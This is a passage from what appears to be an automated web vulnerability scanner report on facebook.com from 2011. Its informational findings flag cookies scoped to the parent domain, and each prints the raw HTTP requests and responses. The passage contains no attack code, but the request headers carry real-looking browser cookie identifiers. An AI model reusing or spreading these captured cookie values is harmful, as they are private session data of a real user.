User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/home.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-FB-Server: 10.53.53.29
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:08:06 GMT
Content-Length: 0

11.314. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:12:01 GMT
Content-Length: 0

11.315. http://www.facebook.com/btaylor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/btaylor

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbtaylor; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /btaylor HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.316. http://www.facebook.com/campaign/impression.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; expires=Fri, 04-Mar-2011 15:11:28 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=ehow.com&placement=activity&extra_1=http%3A%2F%2Fwww.ehow.com%2F&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=63203377906&font=arial&height=300&locale=en_US&recommendations=false&sdk=joey&site=http%3A%2F%2Fwww.ehow.com%2F&width=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dconstantcontact.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.constantcontact.com%252Findex.jsp%26extra_2%3DUS; lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; expires=Fri, 04-Mar-2011 15:11:28 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Wed, 02 Feb 2011 15:11:28 GMT

GIF89a.............!.......,...........D..;

11.317. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Fri, 04-Mar-2011 15:46:05 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; wd=86x22; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Fri, 04-Mar-2011 15:46:05 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 02 Feb 2011 15:46:05 GMT
Content-Length: 0

11.318. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.319. http://www.facebook.com/developers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/developers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /developers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/developers/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:08:25 GMT
Content-Length: 0

11.320. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.321. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.322. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.323. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/find-friends/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 04:10:06 GMT
Content-Length: 0

11.324. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: W=1296674535; made_write_conn=1296674535; __utmz=87286159.1296663493.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=8CJHTYhjyotVYfKpZ5B35lnF; __utma=87286159.380325508.1296663493.1296663493.1296663493.1; lsd=ErPUD; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; __utmc=87286159; wd=1036x1012; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; __utmb=87286159.1.10.1296663493;

Response

11.325. http://www.facebook.com/ligatt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ligatt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fligatt; path=/; domain=.facebook.com
W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ligatt HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
